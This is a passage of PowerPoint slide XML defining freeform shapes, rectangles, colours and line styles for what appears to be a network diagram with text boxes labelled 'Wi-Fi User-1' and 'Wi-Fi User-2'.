                          <a:pt x="17" y="337"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="518" y="337"/>
                          <a:pt x="518" y="337"/>
                          <a:pt x="518" y="337"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="528" y="337"/>
                          <a:pt x="535" y="329"/>
                          <a:pt x="535" y="320"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="535" y="17"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="A5A09C"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="0C080C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4" name="Freeform 784"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2653" y="1808"/>
                    <a:ext cx="155" cy="144"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 66 w 66"/>
                      <a:gd name="T1" fmla="*/ 50 h 61"/>
                      <a:gd name="T2" fmla="*/ 55 w 66"/>
                      <a:gd name="T3" fmla="*/ 61 h 61"/>
                      <a:gd name="T4" fmla="*/ 10 w 66"/>
                      <a:gd name="T5" fmla="*/ 61 h 61"/>
                      <a:gd name="T6" fmla="*/ 0 w 66"/>
                      <a:gd name="T7" fmla="*/ 50 h 61"/>
                      <a:gd name="T8" fmla="*/ 0 w 66"/>
                      <a:gd name="T9" fmla="*/ 10 h 61"/>
                      <a:gd name="T10" fmla="*/ 10 w 66"/>
                      <a:gd name="T11" fmla="*/ 0 h 61"/>
                      <a:gd name="T12" fmla="*/ 55 w 66"/>
                      <a:gd name="T13" fmla="*/ 0 h 61"/>
                      <a:gd name="T14" fmla="*/ 66 w 66"/>
                      <a:gd name="T15" fmla="*/ 10 h 61"/>
                      <a:gd name="T16" fmla="*/ 66 w 66"/>
                      <a:gd name="T17" fmla="*/ 50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6" h="61">
                        <a:moveTo>
                          <a:pt x="66" y="50"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="56"/>
                          <a:pt x="61" y="61"/>
                          <a:pt x="55" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="10" y="61"/>
                          <a:pt x="10" y="61"/>
                          <a:pt x="10" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4" y="61"/>
                          <a:pt x="0" y="56"/>
                          <a:pt x="0" y="5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5"/>
                          <a:pt x="4" y="0"/>
                          <a:pt x="10" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="0"/>
                          <a:pt x="55" y="0"/>
                          <a:pt x="55" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="61" y="0"/>
                          <a:pt x="66" y="5"/>
                          <a:pt x="66" y="10"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="66" y="5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5875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5" name="Freeform 785"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2653" y="1817"/>
                    <a:ext cx="70" cy="45"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 70"/>
                      <a:gd name="T1" fmla="*/ 24 h 45"/>
                      <a:gd name="T2" fmla="*/ 16 w 70"/>
                      <a:gd name="T3" fmla="*/ 24 h 45"/>
                      <a:gd name="T4" fmla="*/ 16 w 70"/>
                      <a:gd name="T5" fmla="*/ 0 h 45"/>
                      <a:gd name="T6" fmla="*/ 59 w 70"/>
                      <a:gd name="T7" fmla="*/ 0 h 45"/>
                      <a:gd name="T8" fmla="*/ 70 w 70"/>
                      <a:gd name="T9" fmla="*/ 38 h 45"/>
                      <a:gd name="T10" fmla="*/ 56 w 70"/>
                      <a:gd name="T11" fmla="*/ 45 h 45"/>
                      <a:gd name="T12" fmla="*/ 47 w 70"/>
                      <a:gd name="T13" fmla="*/ 31 h 45"/>
                      <a:gd name="T14" fmla="*/ 0 w 70"/>
                      <a:gd name="T15" fmla="*/ 31 h 45"/>
                      <a:gd name="T16" fmla="*/ 0 w 70"/>
                      <a:gd name="T17" fmla="*/ 24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0" h="45">
                        <a:moveTo>
                          <a:pt x="0" y="24"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="16" y="24"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="16" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="59" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="70" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="47" y="31"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="31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5875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6" name="Freeform 786"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2653" y="1895"/>
                    <a:ext cx="70" cy="45"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 70"/>
                      <a:gd name="T1" fmla="*/ 21 h 45"/>
                      <a:gd name="T2" fmla="*/ 16 w 70"/>
                      <a:gd name="T3" fmla="*/ 21 h 45"/>
                      <a:gd name="T4" fmla="*/ 16 w 70"/>
                      <a:gd name="T5" fmla="*/ 45 h 45"/>
                      <a:gd name="T6" fmla="*/ 59 w 70"/>
                      <a:gd name="T7" fmla="*/ 45 h 45"/>
                      <a:gd name="T8" fmla="*/ 70 w 70"/>
                      <a:gd name="T9" fmla="*/ 7 h 45"/>
                      <a:gd name="T10" fmla="*/ 56 w 70"/>
                      <a:gd name="T11" fmla="*/ 0 h 45"/>
                      <a:gd name="T12" fmla="*/ 47 w 70"/>
                      <a:gd name="T13" fmla="*/ 14 h 45"/>
                      <a:gd name="T14" fmla="*/ 0 w 70"/>
                      <a:gd name="T15" fmla="*/ 14 h 45"/>
                      <a:gd name="T16" fmla="*/ 0 w 70"/>
                      <a:gd name="T17" fmla="*/ 21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0" h="45">
                        <a:moveTo>
                          <a:pt x="0" y="21"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="16" y="21"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="16" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="59" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="70" y="7"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="47" y="14"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="14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5875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7" name="Freeform 787"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2653" y="1878"/>
                    <a:ext cx="56" cy="31"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 56"/>
                      <a:gd name="T1" fmla="*/ 31 h 31"/>
                      <a:gd name="T2" fmla="*/ 47 w 56"/>
                      <a:gd name="T3" fmla="*/ 31 h 31"/>
                      <a:gd name="T4" fmla="*/ 56 w 56"/>
                      <a:gd name="T5" fmla="*/ 17 h 31"/>
                      <a:gd name="T6" fmla="*/ 56 w 56"/>
                      <a:gd name="T7" fmla="*/ 0 h 31"/>
                      <a:gd name="T8" fmla="*/ 7 w 56"/>
                      <a:gd name="T9" fmla="*/ 0 h 31"/>
                      <a:gd name="T10" fmla="*/ 7 w 56"/>
                      <a:gd name="T11" fmla="*/ 24 h 31"/>
                      <a:gd name="T12" fmla="*/ 0 w 56"/>
                      <a:gd name="T13" fmla="*/ 24 h 31"/>
                      <a:gd name="T14" fmla="*/ 0 w 56"/>
                      <a:gd name="T15" fmla="*/ 31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6" h="31">
                        <a:moveTo>
                          <a:pt x="0" y="31"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="47" y="31"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="17"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="7" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="7" y="24"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="24"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3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5875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8" name="Freeform 788"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2653" y="1848"/>
                    <a:ext cx="56" cy="30"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 56"/>
                      <a:gd name="T1" fmla="*/ 0 h 30"/>
                      <a:gd name="T2" fmla="*/ 47 w 56"/>
                      <a:gd name="T3" fmla="*/ 0 h 30"/>
                      <a:gd name="T4" fmla="*/ 56 w 56"/>
                      <a:gd name="T5" fmla="*/ 14 h 30"/>
                      <a:gd name="T6" fmla="*/ 56 w 56"/>
                      <a:gd name="T7" fmla="*/ 30 h 30"/>
                      <a:gd name="T8" fmla="*/ 7 w 56"/>
                      <a:gd name="T9" fmla="*/ 30 h 30"/>
                      <a:gd name="T10" fmla="*/ 7 w 56"/>
                      <a:gd name="T11" fmla="*/ 7 h 30"/>
                      <a:gd name="T12" fmla="*/ 0 w 56"/>
                      <a:gd name="T13" fmla="*/ 7 h 30"/>
                      <a:gd name="T14" fmla="*/ 0 w 56"/>
                      <a:gd name="T15" fmla="*/ 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6" h="30">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="47" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="14"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="30"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="7" y="30"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="7" y="7"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="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5875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9" name="Freeform 789"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2735" y="1817"/>
                    <a:ext cx="73" cy="45"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 73 w 73"/>
                      <a:gd name="T1" fmla="*/ 24 h 45"/>
                      <a:gd name="T2" fmla="*/ 55 w 73"/>
                      <a:gd name="T3" fmla="*/ 24 h 45"/>
                      <a:gd name="T4" fmla="*/ 55 w 73"/>
                      <a:gd name="T5" fmla="*/ 0 h 45"/>
                      <a:gd name="T6" fmla="*/ 12 w 73"/>
                      <a:gd name="T7" fmla="*/ 0 h 45"/>
                      <a:gd name="T8" fmla="*/ 0 w 73"/>
                      <a:gd name="T9" fmla="*/ 38 h 45"/>
                      <a:gd name="T10" fmla="*/ 17 w 73"/>
                      <a:gd name="T11" fmla="*/ 45 h 45"/>
                      <a:gd name="T12" fmla="*/ 24 w 73"/>
                      <a:gd name="T13" fmla="*/ 31 h 45"/>
                      <a:gd name="T14" fmla="*/ 73 w 73"/>
                      <a:gd name="T15" fmla="*/ 31 h 45"/>
                      <a:gd name="T16" fmla="*/ 73 w 73"/>
                      <a:gd name="T17" fmla="*/ 24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3" h="45">
                        <a:moveTo>
                          <a:pt x="73" y="24"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="55" y="24"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="17" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="24" y="31"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="73" y="31"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="73" y="2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5875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0" name="Freeform 790"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2735" y="1895"/>
                    <a:ext cx="73" cy="45"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 73 w 73"/>
                      <a:gd name="T1" fmla="*/ 21 h 45"/>
                      <a:gd name="T2" fmla="*/ 55 w 73"/>
                      <a:gd name="T3" fmla="*/ 21 h 45"/>
                      <a:gd name="T4" fmla="*/ 55 w 73"/>
                      <a:gd name="T5" fmla="*/ 45 h 45"/>
                      <a:gd name="T6" fmla="*/ 12 w 73"/>
                      <a:gd name="T7" fmla="*/ 45 h 45"/>
                      <a:gd name="T8" fmla="*/ 0 w 73"/>
                      <a:gd name="T9" fmla="*/ 7 h 45"/>
                      <a:gd name="T10" fmla="*/ 17 w 73"/>
                      <a:gd name="T11" fmla="*/ 0 h 45"/>
                      <a:gd name="T12" fmla="*/ 24 w 73"/>
                      <a:gd name="T13" fmla="*/ 14 h 45"/>
                      <a:gd name="T14" fmla="*/ 73 w 73"/>
                      <a:gd name="T15" fmla="*/ 14 h 45"/>
                      <a:gd name="T16" fmla="*/ 73 w 73"/>
                      <a:gd name="T17" fmla="*/ 21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3" h="45">
                        <a:moveTo>
                          <a:pt x="73" y="21"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="55" y="21"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="7"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="17" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="24" y="14"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="73" y="14"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="73" y="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5875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1" name="Freeform 791"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2752" y="1878"/>
                    <a:ext cx="56" cy="31"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 56 w 56"/>
                      <a:gd name="T1" fmla="*/ 31 h 31"/>
                      <a:gd name="T2" fmla="*/ 9 w 56"/>
                      <a:gd name="T3" fmla="*/ 31 h 31"/>
                      <a:gd name="T4" fmla="*/ 0 w 56"/>
                      <a:gd name="T5" fmla="*/ 17 h 31"/>
                      <a:gd name="T6" fmla="*/ 0 w 56"/>
                      <a:gd name="T7" fmla="*/ 0 h 31"/>
                      <a:gd name="T8" fmla="*/ 47 w 56"/>
                      <a:gd name="T9" fmla="*/ 0 h 31"/>
                      <a:gd name="T10" fmla="*/ 47 w 56"/>
                      <a:gd name="T11" fmla="*/ 24 h 31"/>
                      <a:gd name="T12" fmla="*/ 56 w 56"/>
                      <a:gd name="T13" fmla="*/ 24 h 31"/>
                      <a:gd name="T14" fmla="*/ 56 w 56"/>
                      <a:gd name="T15" fmla="*/ 31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6" h="31">
                        <a:moveTo>
                          <a:pt x="56" y="31"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="9" y="31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lnTo>
                          <a:pt x="47" y="24"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="24"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="3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5875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2" name="Freeform 792"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2752" y="1848"/>
                    <a:ext cx="56" cy="30"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 56 w 56"/>
                      <a:gd name="T1" fmla="*/ 0 h 30"/>
                      <a:gd name="T2" fmla="*/ 9 w 56"/>
                      <a:gd name="T3" fmla="*/ 0 h 30"/>
                      <a:gd name="T4" fmla="*/ 0 w 56"/>
                      <a:gd name="T5" fmla="*/ 14 h 30"/>
                      <a:gd name="T6" fmla="*/ 0 w 56"/>
                      <a:gd name="T7" fmla="*/ 30 h 30"/>
                      <a:gd name="T8" fmla="*/ 47 w 56"/>
                      <a:gd name="T9" fmla="*/ 30 h 30"/>
                      <a:gd name="T10" fmla="*/ 47 w 56"/>
                      <a:gd name="T11" fmla="*/ 7 h 30"/>
                      <a:gd name="T12" fmla="*/ 56 w 56"/>
                      <a:gd name="T13" fmla="*/ 7 h 30"/>
                      <a:gd name="T14" fmla="*/ 56 w 56"/>
                      <a:gd name="T15" fmla="*/ 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6" h="30">
                        <a:moveTo>
                          <a:pt x="56" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="9" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="14"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="30"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="47" y="30"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="47" y="7"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56" y="7"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="56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5875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3" name="Rectangle 793"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2653" y="2148"/>
                    <a:ext cx="215" cy="59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Rectangle 794"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3049" y="2148"/>
                    <a:ext cx="218" cy="59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5" name="Rectangle 795"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3449" y="2148"/>
                    <a:ext cx="217" cy="59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6" name="Rectangle 796"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3049" y="1590"/>
                    <a:ext cx="617" cy="362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7" name="Freeform 797"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1819" y="1725"/>
                    <a:ext cx="1263" cy="796"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 535"/>
                      <a:gd name="T1" fmla="*/ 17 h 337"/>
                      <a:gd name="T2" fmla="*/ 17 w 535"/>
                      <a:gd name="T3" fmla="*/ 0 h 337"/>
                      <a:gd name="T4" fmla="*/ 518 w 535"/>
                      <a:gd name="T5" fmla="*/ 0 h 337"/>
                      <a:gd name="T6" fmla="*/ 535 w 535"/>
                      <a:gd name="T7" fmla="*/ 17 h 337"/>
                      <a:gd name="T8" fmla="*/ 535 w 535"/>
                      <a:gd name="T9" fmla="*/ 320 h 337"/>
                      <a:gd name="T10" fmla="*/ 518 w 535"/>
                      <a:gd name="T11" fmla="*/ 337 h 337"/>
                      <a:gd name="T12" fmla="*/ 17 w 535"/>
                      <a:gd name="T13" fmla="*/ 337 h 337"/>
                      <a:gd name="T14" fmla="*/ 0 w 535"/>
                      <a:gd name="T15" fmla="*/ 320 h 337"/>
                      <a:gd name="T16" fmla="*/ 0 w 535"/>
                      <a:gd name="T17" fmla="*/ 17 h 3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35" h="337">
                        <a:moveTo>
                          <a:pt x="0" y="17"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="7"/>
                          <a:pt x="7" y="0"/>
                          <a:pt x="17" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="518" y="0"/>
                          <a:pt x="518" y="0"/>
                          <a:pt x="518" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="527" y="0"/>
                          <a:pt x="535" y="7"/>
                          <a:pt x="535" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="535" y="320"/>
                          <a:pt x="535" y="320"/>
                          <a:pt x="535" y="320"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="535" y="330"/>
                          <a:pt x="527" y="337"/>
                          <a:pt x="518" y="337"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="337"/>
                          <a:pt x="17" y="337"/>
                          <a:pt x="17" y="337"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="337"/>
                          <a:pt x="0" y="330"/>
                          <a:pt x="0" y="320"/>
                        </a:cubicBez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A5A09C"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="0C080C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8" name="Rectangle 798"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1819" y="1864"/>
                    <a:ext cx="1263" cy="178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5875">
                        <a:solidFill>
                          <a:srgbClr val="0C080C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9" name="Rectangle 799"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2478" y="2136"/>
                    <a:ext cx="541" cy="33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587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0" name="Rectangle 800"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2478" y="2228"/>
                    <a:ext cx="541" cy="33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587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1" name="Rectangle 801"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2478" y="2320"/>
                    <a:ext cx="541" cy="33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587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574" name="Text Box 863"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4451377" y="1218911"/>
              <a:ext cx="97174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Wi-Fi User-1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75" name="Text Box 868"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6413248" y="1498712"/>
              <a:ext cx="97174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Wi-Fi User-2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="576" name="Group 872"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7011786" y="2291676"/>
              <a:ext cx="498124" cy="148937"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="577" name="Freeform 873"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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8" name="Freeform 874"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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9" name="Freeform 875"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344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0" name="Freeform 876"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
